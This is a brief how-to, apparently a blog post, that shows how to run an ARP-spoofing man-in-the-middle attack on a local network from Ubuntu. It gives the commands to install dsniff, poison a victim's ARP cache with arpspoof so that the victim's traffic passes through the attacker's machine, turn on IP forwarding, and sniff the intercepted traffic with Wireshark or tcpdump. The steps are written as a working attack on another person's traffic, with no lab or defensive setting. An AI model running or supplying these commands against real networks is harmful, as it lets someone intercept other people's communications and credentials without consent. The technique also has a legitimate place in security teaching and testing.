How to perform Man-in-the-Middle attacks without those big GUI tools

This is done from a Linux box, running Ubuntu 11.10

sudo apt-get install dsniff

This will install the arp spoofing tool “arpspoof” that we need to poison the ARP-cache. Run it like so:

sudo arpspoof -i <your NIC> -t <the IP you want to grab data from> <the IP you want to impersonate (usually the gateway)>

All traffic will now end up on your computer. To automatically forward said traffic, run the following command:

sudo sysctl net.ipv4.conf.all.forwarding=1

Traffic is now being forwarded. To see if you already have this enabled, run this:

sysctl -a | grep forward

To disable it, just set forwarding=0

Now you can run Wireshark or tcpdump and sniff the traffic.